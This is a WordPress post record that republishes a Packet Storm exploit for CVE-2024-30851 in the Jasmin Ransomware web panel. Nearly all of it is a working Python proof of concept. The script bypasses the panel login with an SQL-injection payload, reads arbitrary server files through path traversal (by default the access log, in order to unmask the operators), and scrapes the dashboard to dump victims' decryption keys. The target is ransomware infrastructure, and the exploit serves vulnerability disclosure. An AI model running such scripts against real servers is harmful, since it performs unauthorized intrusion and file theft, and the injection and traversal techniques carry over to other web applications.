{"id":56113,"date":"2024-04-06T00:41:23","date_gmt":"2024-04-05T20:41:23","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177945\/jasminransomware11-fileread.txt"},"modified":"2024-04-06T00:41:23","modified_gmt":"2024-04-05T20:41:23","slug":"jasmin-ransomware-1-1-arbitrary-file-read","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/jasmin-ransomware-1-1-arbitrary-file-read\/","title":{"rendered":"Jasmin Ransomware 1.1 Arbitrary File Read"},"content":{"rendered":"<p># Exploit Title: Jasmin Ransomware arbitrary file read<br \/># Date: 2024-04-04<br \/># Exploit Author: @_chebuya<br \/># Software Link: https:\/\/github.com\/codesiddhant\/Jasmin-Ransomware<br \/># Version: v1.1<br \/># Tested on: Ubuntu 20.04 LTS<br \/># CVE: CVE-2024-30851<br \/># Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login<br \/># Github: https:\/\/github.com\/chebuya\/CVE-2024-30851-jasmin-ransomware-path-traversal-poc\/tree\/main<br \/>import requests<br \/>import argparse<br \/>import os<br \/>from bs4 import BeautifulSoup<\/p>\n<p>def get_file(jasmin_url, filepath):<br \/>response = requests.get(<br \/>f'{jasmin_url}\/download_file.php?file={filepath}&#8217;,<br \/>allow_redirects=False<br \/>)<\/p>\n<p>return response.text<\/p>\n<p>def get_keys(jasmin_url):<br \/>headers = {<br \/>&#8216;Content-Type&#8217;: &#8216;application\/x-www-form-urlencoded; charset=UTF-8&#8217;,<br \/>}<\/p>\n<p>data = &#8220;username=&amp;password=&#8217;+or+1%3D1+&#8211;+-&amp;service=login&#8221;<br \/>login_req = requests.post(f'{jasmin_url}\/checklogin.php&#8217;, headers=headers, data=data)<br \/>cookies = login_req.cookies<\/p>\n<p>list_req = requests.get(f'{jasmin_url}\/dashboard.php&#8217;, cookies=cookies)<br \/>soup = BeautifulSoup(list_req.text, &#8216;html.parser&#8217;)<\/p>\n<p>rows = 
soup.find_all(&#8216;tr&#8217;)<\/p>\n<p>print(f&#8221;Dumping decryption keys from {len(rows)-1} victims&#8221;)<br \/>for row in rows:<br \/>data = row.find_all(&#8216;td&#8217;)<br \/>if len(data) == 0:<br \/>continue<\/p>\n<p>username = data[1].get_text()<br \/>hostname = data[0].get_text()<br \/>filepath = data[7].find(&#8216;a&#8217;)[&#8216;href&#8217;].split(&#8220;=&#8221;)[1]\n<p>print(f&#8221;Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}&#8221;)<\/p>\n<p>parser = argparse.ArgumentParser(description=&#8221;LFD\/SQLi Exploit PoC for Jasmin Ransomware panel&#8221;)<br \/>subparser = parser.add_subparsers(dest=&#8217;subcommand&#8217;)<\/p>\n<p>file_parser = subparser.add_parser(&#8220;getfile&#8221;, help=&#8221;Read a file off the server&#8221;)<br \/>file_parser.add_argument(&#8220;-u&#8221;, &#8220;&#8211;url&#8221;, required=True, help=&#8221;The jasmin ransomware web panel url (http:\/\/target_server)&#8221;)<br \/>file_parser.add_argument(&#8220;-f&#8221;, &#8220;&#8211;file&#8221;, default=&#8221;c:\/xampp\/apache\/logs\/access.log&#8221;, help=&#8221;The file to read on the target server&#8221;) # Default is the access log, deanonymize the operators!<\/p>\n<p>keys_parser = subparser.add_parser(&#8220;getkeys&#8221;, help=&#8221;Get decryption keys of victims&#8221;)<br \/>keys_parser.add_argument(&#8220;-u&#8221;, &#8220;&#8211;url&#8221;, required=True, help=&#8221;The jasmin ransomware web panel url (http:\/\/target_server)&#8221;)<\/p>\n<p>args = parser.parse_args()<\/p>\n<p>if args.subcommand != None:<br \/>target_url = args.url.rstrip(&#8220;\/&#8221;)<\/p>\n<p>if args.subcommand == &#8220;getkeys&#8221;:<br \/>get_keys(target_url)<br \/>elif args.subcommand == &#8220;getfile&#8221;:<br \/>target_file = args.file.replace(&#8220;\\\\&#8221;, &#8220;\/&#8221;).replace(&#8220;c:&#8221;, &#8220;&#8221;)<br \/>target_path = os.path.join(&#8220;..\/..\/..\/..\/..\/..\/..\/..\/..\/&#8221;, target_file)<br 
\/>print(get_file(target_url, target_path))<br \/>else:<br \/>parser.print_help()<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Jasmin Ransomware arbitrary file read # Date: 2024-04-04 # Exploit Author: @_chebuya # Software Link: https:\/\/github.com\/codesiddhant\/Jasmin-Ransomware # Version: v1.1 # Tested on: Ubuntu 20.04 LTS # CVE: CVE-2024-30851 # Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login # Github: https:\/\/github.com\/chebuya\/CVE-2024-30851-jasmin-ransomware-path-traversal-poc\/tree\/main import requests import &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56113","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56113","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56113"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56113\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56113"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56113"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56113"}],"
curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}